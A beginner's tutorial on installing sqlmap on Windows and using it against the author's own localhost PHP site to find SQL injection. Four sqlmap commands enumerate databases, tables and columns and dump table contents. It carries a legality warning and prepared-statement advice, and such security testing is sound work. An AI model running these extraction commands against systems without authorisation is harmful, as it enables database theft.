Check SQL Injection Vulnerabilities of Website Using sqlmap - Windows

In this tutorial, i will show you how to check SQL injection vulnerabilities in your website in windows. It is very easy. All you want to do is just install an open source software named sqlmap. sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It is a tool used by many hackers and developers in their Kali linux. But you can easily install it on your windows machine too.

Before we start let's check what is SQL injection?

      SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS). Since an SQL Injection vulnerability could possibly affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.

Installaton procedure of sqlmap in windows

1. Sqlmap is developed in python so you need to download and install python 2.7 on your computer. Download python by visiting following link.
2. Now add python to windows path. if you don't know how to add python to windows visit the following link.
3. Now download sqlmap fromGitHub by visiting the following link.
4. Now unzip it and open cmd in that folder.

Now Some SQL map commands

       Note I used my mini project in localhost to demo SQL injection here. Note it is illegal to check SQL injection vulnerabilities of others website without their permission. So please use your websites only. My mini project is a small PHP website which I developed 2 years ago. It is my first website so at that time  I don't know about these security vulnerabilities so I don't use any prepared statements. I will make a tutorial on how to prevent SQL injection in PHP in future.

1) List DBMS databases using SQLMAP SQL Injection

python sqlmap.py -u http://localhost/miniprojecti/preview.php?id=Gandhi%20Before%20India --dbs 

2) List tables of target database using SQLMAP SQL Injection 

python sqlmap.py -u http://localhost/miniprojecti/preview.php?id=Gandhi%20Before%20India -D miniproject --tables

3) List columns on target table of selected database using SQLMAP SQL Injection

python sqlmap.py -u http://localhost/miniprojecti/preview.php?id=Gandhi%20Before%20India -D miniproject -T migrations --columns

4) List contents of target columns of target table of selected database using SQLMAP SQL Injection

python sqlmap.py -u http://localhost/miniprojecti/preview.php?id=Gandhi%20Before%20India -D miniproject -T migrations -C migration --dump

Note if you are a PHP developer please use any frameworks like CodeIgniter of Laravel or always use prepared statements. Using a simple framework like CodeIgniter can improve your website security very much.

Note I use both username and password for my mini project database but still sqlmap is powerful to find everything.

If you have any doubts please comment below.